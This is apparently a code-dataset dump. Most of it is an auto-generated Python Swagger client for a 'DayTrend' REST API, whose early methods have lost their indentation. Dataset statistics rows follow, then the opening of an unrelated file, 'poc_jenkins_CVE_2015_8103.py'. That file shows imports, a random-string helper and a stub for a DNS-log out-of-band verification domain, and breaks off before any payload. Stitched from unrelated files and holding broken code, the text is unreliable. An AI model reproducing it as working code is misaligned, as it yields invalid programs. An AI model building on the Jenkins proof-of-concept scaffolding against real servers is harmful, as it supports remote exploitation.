<strong><em>accepts two 
values</em></strong>)</li></ul>
:param str _or: <h4>Adds <code>OR</code> conditions to the request.</h4><i>Syntax:</i> <strong>?or=field||condition||value</strong><br/>It uses the same conditions as the filter parameter<br/><i>Rules and <i>Examples:</i></i><ul><li>If there is only <strong>one</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as simple filter:</li><ul><li><strong>?or=name||eq||batman</strong></li></ul></ul><ul><li>If there are <strong>multiple</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as a compination of <code>OR</code> conditions, as follows:<br><code>WHERE {or} OR {or} OR ...</code></li><ul><li><strong>?or=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If there are <strong>one</strong> <code>or</code> and <strong>one</strong> <code>filter</code> then it will be interpreted as <code>OR</code> condition, as follows:<br><code>WHERE {filter} OR {or}</code></li><ul><li><strong>?filter=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If present <strong>both</strong> <code>or</code> and <code>filter</code> in any amount (<strong>one</strong> or <strong>miltiple</strong> each) then both interpreted as a combitation of <code>AND</code> conditions and compared with each other by <code>OR</code> condition, as follows:<br><code>WHERE ({filter} AND {filter} AND ...) OR ({or} AND {or} AND ...)</code></li><ul><li><strong>?filter=type||eq||hero&filter=status||eq||alive&or=type||eq||villain&or=status||eq||dead</strong></li></ul></ul>
:param str sort: <h4>Adds sort by field (by multiple fields) and order to query result.</h4><i>Syntax:</i> <strong>?sort=field,ASC|DESC</strong><br/><i>Examples:</i></i><ul><li><strong>?sort=name,ASC</strong></li><li><strong>?sort=name,ASC&sort=id,DESC</strong></li></ul>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float per_page: <h4>Receive <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?per_page=number</strong><br/><i>Example:</i> <strong>?per_page=10</strong>
:param float offset: <h4>Offset <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?offset=number</strong><br/><i>Example:</i> <strong>?offset=10</strong>
:param float page: <h4>Receive a portion of <code>limit</code> entities (alternative to <code>offset</code>). Will be applied if <code>limit</code> is set up.</h4><i>Syntax:</i> <strong>?page=number</strong><br/><i>Example:</i> <strong>?page=2</strong>
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_get_with_http_info(**kwargs) # noqa: E501
return data
def v1_day_trend_get_with_http_info(self, **kwargs): # noqa: E501
"""Retrieve many DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str filter: <h4>Adds fields request condition (multiple conditions) to the request.</h4><i>Syntax:</i> <strong>?filter=field||condition||value</strong><br/><i>Examples:</i> <ul><li><strong>?filter=name||eq||batman</strong></li><li><strong>?filter=isVillain||eq||false&filter=city||eq||Arkham</strong> (multiple filters are treated as a combination of AND type of conditions)</li><li><strong>?filter=shots||in||12,26</strong> (some conditions accept multiple values separated by commas)</li><li><strong>?filter=power||isnull</strong> (some conditions don't accept value)</li></ul><br/>Filter Conditions:<ul><li><strong><code>eq</code></strong> (<code>=</code>, equal)</li><li><strong><code>ne</code></strong> (<code>!=</code>, not equal)</li><li><strong><code>gt</code></strong> (<code>></code>, greater than)</li><li><strong><code>lt</code></strong> (<code><</code>, lower that)</li><li><strong><code>gte</code></strong> (<code>>=</code>, greater than or equal)</li><li><strong><code>lte</code></strong> (<code><=</code>, lower than or equal)</li><li><strong><code>starts</code></strong> (<code>LIKE val%</code>, starts with)</li><li><strong><code>ends</code></strong> (<code>LIKE %val</code>, ends with)</li><li><strong><code>cont</code></strong> (<code>LIKE %val%</code>, contains)</li><li><strong><code>excl</code></strong> (<code>NOT LIKE %val%</code>, not contains)</li><li><strong><code>in</code></strong> (<code>IN</code>, in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>notin</code></strong> (<code>NOT IN</code>, not in range, <strong><em>accepts multiple values</em></strong>)</li><li><strong><code>isnull</code></strong> (<code>IS NULL</code>, is NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>notnull</code></strong> (<code>IS NOT NULL</code>, not NULL, <strong><em>doesn't accept value</em></strong>)</li><li><strong><code>between</code></strong> (<code>BETWEEN</code>, between, <strong><em>accepts two 
values</em></strong>)</li></ul>
:param str _or: <h4>Adds <code>OR</code> conditions to the request.</h4><i>Syntax:</i> <strong>?or=field||condition||value</strong><br/>It uses the same conditions as the filter parameter<br/><i>Rules and <i>Examples:</i></i><ul><li>If there is only <strong>one</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as simple filter:</li><ul><li><strong>?or=name||eq||batman</strong></li></ul></ul><ul><li>If there are <strong>multiple</strong> <code>or</code> present (without <code>filter</code>) then it will be interpreted as a compination of <code>OR</code> conditions, as follows:<br><code>WHERE {or} OR {or} OR ...</code></li><ul><li><strong>?or=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If there are <strong>one</strong> <code>or</code> and <strong>one</strong> <code>filter</code> then it will be interpreted as <code>OR</code> condition, as follows:<br><code>WHERE {filter} OR {or}</code></li><ul><li><strong>?filter=name||eq||batman&or=name||eq||joker</strong></li></ul></ul><ul><li>If present <strong>both</strong> <code>or</code> and <code>filter</code> in any amount (<strong>one</strong> or <strong>miltiple</strong> each) then both interpreted as a combitation of <code>AND</code> conditions and compared with each other by <code>OR</code> condition, as follows:<br><code>WHERE ({filter} AND {filter} AND ...) OR ({or} AND {or} AND ...)</code></li><ul><li><strong>?filter=type||eq||hero&filter=status||eq||alive&or=type||eq||villain&or=status||eq||dead</strong></li></ul></ul>
:param str sort: <h4>Adds sort by field (by multiple fields) and order to query result.</h4><i>Syntax:</i> <strong>?sort=field,ASC|DESC</strong><br/><i>Examples:</i></i><ul><li><strong>?sort=name,ASC</strong></li><li><strong>?sort=name,ASC&sort=id,DESC</strong></li></ul>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float per_page: <h4>Receive <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?per_page=number</strong><br/><i>Example:</i> <strong>?per_page=10</strong>
:param float offset: <h4>Offset <code>N</code> amount of entities.</h4><i>Syntax:</i> <strong>?offset=number</strong><br/><i>Example:</i> <strong>?offset=10</strong>
:param float page: <h4>Receive a portion of <code>limit</code> entities (alternative to <code>offset</code>). Will be applied if <code>limit</code> is set up.</h4><i>Syntax:</i> <strong>?page=number</strong><br/><i>Example:</i> <strong>?page=2</strong>
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: list[DayTrend]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['fields', 'filter', '_or', 'sort', 'join', 'per_page', 'offset', 'page', 'cache'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if '_or' in params:
query_params.append(('or', params['_or'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'join' in params:
query_params.append(('join', params['join'])) # noqa: E501
if 'per_page' in params:
query_params.append(('per_page', params['per_page'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'cache' in params:
query_params.append(('cache', params['cache'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[DayTrend]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_delete(self, id, **kwargs): # noqa: E501
"""Delete one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_get(self, id, **kwargs): # noqa: E501
"""Retrieve one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieve one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: (required)
:param str fields: <h4>Selects fields that should be returned in the reponse body.</h4><i>Syntax:</i> <strong>?fields=field1,field2,...</strong> <br/><i>Example:</i> <strong>?fields=email,name</strong>
:param str join: <h4>Receive joined relational objects in GET result (with all or selected fields).</h4><i>Syntax:</i><ul><li><strong>?join=relation</strong></li><li><strong>?join=relation||field1,field2,...</strong></li><li><strong>?join=relation1||field11,field12,...&join=relation1.nested||field21,field22,...&join=...</strong></li></ul><br/><i>Examples:</i></i><ul><li><strong>?join=profile</strong></li><li><strong>?join=profile||firstName,email</strong></li><li><strong>?join=profile||firstName,email&join=notifications||content&join=tasks</strong></li><li><strong>?join=relation1&join=relation1.nested&join=relation1.nested.deepnested</strong></li></ul><strong><i>Notice:</i></strong> <code>id</code> field always persists in relational objects. To use nested relations, the parent level MUST be set before the child level like example above.
:param float cache: <h4>Reset cache (if was enabled) and receive entities from the DB.</h4><i>Usage:</i> <strong>?cache=0</strong>
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fields', 'join', 'cache'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'join' in params:
query_params.append(('join', params['join'])) # noqa: E501
if 'cache' in params:
query_params.append(('cache', params['cache'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_patch(self, day_trend, id, **kwargs): # noqa: E501
"""Update one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_patch(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_patch_with_http_info(day_trend, id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_patch_with_http_info(day_trend, id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_patch_with_http_info(self, day_trend, id, **kwargs): # noqa: E501
"""Update one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_patch_with_http_info(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['day_trend', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_patch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'day_trend' is set
if ('day_trend' not in params or
params['day_trend'] is None):
raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_id_patch`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_patch`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend' in params:
body_params = params['day_trend']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_id_put(self, day_trend, id, **kwargs): # noqa: E501
"""Replace one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_put(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_id_put_with_http_info(day_trend, id, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_id_put_with_http_info(day_trend, id, **kwargs) # noqa: E501
return data
def v1_day_trend_id_put_with_http_info(self, day_trend, id, **kwargs): # noqa: E501
"""Replace one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_id_put_with_http_info(day_trend, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:param float id: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['day_trend', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_day_trend_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'day_trend' is set
if ('day_trend' not in params or
params['day_trend'] is None):
raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_id_put`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `v1_day_trend_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'day_trend' in params:
body_params = params['day_trend']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['bearer'] # noqa: E501
return self.api_client.call_api(
'/v1/day-trend/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DayTrend', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def v1_day_trend_post(self, day_trend, **kwargs): # noqa: E501
"""Create one DayTrend # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_day_trend_post(day_trend, async_req=True)
>>> result = thread.get()
:param async_req bool
:param DayTrend day_trend: (required)
:return: DayTrend
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.v1_day_trend_post_with_http_info(day_trend, **kwargs) # noqa: E501
else:
(data) = self.v1_day_trend_post_with_http_info(day_trend, **kwargs) # noqa: E501
return data
def v1_day_trend_post_with_http_info(self, day_trend, **kwargs):  # noqa: E501
    """Create one DayTrend  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead of the deserialized response.
    >>> thread = api.v1_day_trend_post_with_http_info(day_trend, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param DayTrend day_trend: (required)
    :return: DayTrend
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['day_trend', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    # collect the explicit argument plus any recognised keyword arguments
    params = {'day_trend': day_trend}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method v1_day_trend_post" % key
            )
        params[key] = val
    # verify the required parameter 'day_trend' is set
    if params.get('day_trend') is None:
        raise ValueError("Missing the required parameter `day_trend` when calling `v1_day_trend_post`")  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/v1/day-trend', 'POST',
        {},  # no path parameters
        [],  # no query parameters
        header_params,
        body=params['day_trend'],
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='DayTrend',  # noqa: E501
        auth_settings=['bearer'],  # Authentication setting  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def v1_day_trend_replace_all_in_source_source_id_post(self, source_id, day_trend_input_list_dto, **kwargs):  # noqa: E501
    """Imports many trends and replace existing. Recomputes alerts  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead of the deserialized response.
    >>> thread = api.v1_day_trend_replace_all_in_source_source_id_post(source_id, day_trend_input_list_dto, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float source_id: (required)
    :param DayTrendInputListDto day_trend_input_list_dto: (required)
    :return: DayTrendListDto
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    call = self.v1_day_trend_replace_all_in_source_source_id_post_with_http_info
    if kwargs.get('async_req'):
        # async path: hand back the request thread
        return call(source_id, day_trend_input_list_dto, **kwargs)  # noqa: E501
    # sync path: the underlying call already unwraps to the data
    return call(source_id, day_trend_input_list_dto, **kwargs)  # noqa: E501
def v1_day_trend_replace_all_in_source_source_id_post_with_http_info(self, source_id, day_trend_input_list_dto, **kwargs):  # noqa: E501
    """Imports many trends and replace existing. Recomputes alerts  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead of the deserialized response.
    >>> thread = api.v1_day_trend_replace_all_in_source_source_id_post_with_http_info(source_id, day_trend_input_list_dto, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float source_id: (required)
    :param DayTrendInputListDto day_trend_input_list_dto: (required)
    :return: DayTrendListDto
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['source_id', 'day_trend_input_list_dto', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501

    # collect the explicit arguments plus any recognised keyword arguments
    params = {'source_id': source_id,
              'day_trend_input_list_dto': day_trend_input_list_dto}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method v1_day_trend_replace_all_in_source_source_id_post" % key
            )
        params[key] = val
    # verify the required parameter 'source_id' is set
    if params.get('source_id') is None:
        raise ValueError("Missing the required parameter `source_id` when calling `v1_day_trend_replace_all_in_source_source_id_post`")  # noqa: E501
    # verify the required parameter 'day_trend_input_list_dto' is set
    if params.get('day_trend_input_list_dto') is None:
        raise ValueError("Missing the required parameter `day_trend_input_list_dto` when calling `v1_day_trend_replace_all_in_source_source_id_post`")  # noqa: E501

    # the only path placeholder is {sourceId}
    path_params = {'sourceId': params['source_id']}  # noqa: E501
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(  # noqa: E501
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/v1/day-trend/replace-all-in-source/{sourceId}', 'POST',
        path_params,
        [],  # no query parameters
        header_params,
        body=params['day_trend_input_list_dto'],
        post_params=[],  # no form fields
        files={},  # no file uploads
        response_type='DayTrendListDto',  # noqa: E501
        auth_settings=['bearer'],  # Authentication setting  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 54.048
| 2,038
| 0.632855
| 6,225
| 47,292
| 4.608353
| 0.051888
| 0.041552
| 0.025796
| 0.015896
| 0.975808
| 0.969708
| 0.955659
| 0.947572
| 0.940077
| 0.933315
| 0
| 0.016293
| 0.231688
| 47,292
| 874
| 2,039
| 54.10984
| 0.773221
| 0.494841
| 0
| 0.776842
| 1
| 0
| 0.192073
| 0.057147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035789
| false
| 0
| 0.008421
| 0
| 0.096842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d0d918d50f97599ad706e14910e3b0bf0085626d
| 22,512
|
py
|
Python
|
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | 5
|
2018-04-27T12:34:08.000Z
|
2020-11-09T10:47:02.000Z
|
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | null | null | null |
scanner/util/script/poc_jenkins_CVE_2015_8103.py
|
Shinpachi8/webscanner
|
52aa377f0ee903a04ed19ea07433d0718697833d
|
[
"Apache-2.0"
] | 3
|
2019-04-08T19:58:20.000Z
|
2020-04-07T15:35:07.000Z
|
# -*- encoding:utf-8 -*-
import socket
import base64
import random
import urllib2
import time
import binascii
from config import is_port_open
def random_str(len):
    """Return a random string of the given length.

    Characters are drawn uniformly (with replacement) from A-H and 0-9.

    :param len: number of characters to generate (name shadows the builtin
        ``len``; kept unchanged for caller compatibility)
    :return: str of exactly ``len`` characters

    Fixes: the original built the result with repeated ``+=`` (quadratic)
    and wrapped an already-str value in a redundant ``str()`` call.
    """
    return "".join(random.choice("ABCDEFGH1234567890") for _ in range(len))
def get_ver_ip(ip):
    """Return the DNS-log domain used for out-of-band verification.

